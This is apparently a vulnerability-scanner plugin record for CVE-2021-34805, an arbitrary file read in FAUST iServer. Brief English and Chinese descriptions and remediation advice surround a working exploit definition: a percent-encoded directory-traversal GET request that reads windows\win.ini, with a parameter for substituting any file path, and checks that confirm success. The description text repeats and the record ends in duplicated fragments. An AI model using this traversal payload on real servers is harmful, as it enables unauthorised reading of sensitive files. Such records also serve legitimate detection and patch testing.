Faust Iserver is a German company Land Software for bringing Faust, Faust Entry and Lidos databases to the Intranet and Internet.
FAUST iServer 9.0.017.017.1- 9.0.018.018.4 has an arbitrary file read vulnerability, and unauthorized users can obtain sensitive information.
FAUST iServer 9.0.017.017.1- 9.0.018.018.4 has an arbitrary file read vulnerability, and unauthorized users can obtain sensitive information.
It is forbidden to be exposed to the public network, and a whitelist can be set for access through security devices such as firewalls.
Pay attention to the official website update in time:http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
", "References": [ "https://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "%5cwindows%5cwin.ini", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "bit app support", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "extensions", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "fonts", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e{{{cmd}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "Tags": [ "Directory Traversal" ], "VulType": [ "Directory Traversal" ], "CVEIDs": [ "CVE-2021-34805" ], "CNNVD": [ "CNNVD-202201-2281" ], "CNVD": [ "" ], "CVSSScore": "7.5", "Translation": { "CN": { "Name": "FAUST iServer 任意文件读取漏洞 (CVE-2021-34805)", "Product": "FAUST iServer", "Description": "Faust Iserver是德国Land Software公司的用于将 Faust、Faust Entry 和 Lidos 数据库带到内联网和互联网上。
FAUST iServer 9.0.017.017.1- 9.0.018.018.4版本存在任意文件读取漏洞,未授权用户可获取敏感信息。
禁止暴露到公网,可通过防火墙等安全设备设置访问的白名单。
及时关注官网更新:http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
", "Impact": "FAUST iServer 9.0.017.017.1- 9.0.018.018.4版本存在任意文件读取漏洞,未授权用户可获取敏感信息。
Faust Iserver is a German company Land Software for bringing Faust, Faust Entry and Lidos databases to the Intranet and Internet.
FAUST iServer 9.0.017.017.1- 9.0.018.018.4 has an arbitrary file read vulnerability, and unauthorized users can obtain sensitive information.
It is forbidden to be exposed to the public network, and a whitelist can be set for access through security devices such as firewalls.
Pay attention to the official website update in time:http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
", "Impact": "FAUST iServer 9.0.017.017.1- 9.0.018.018.4 has an arbitrary file read vulnerability, and unauthorized users can obtain sensitive information.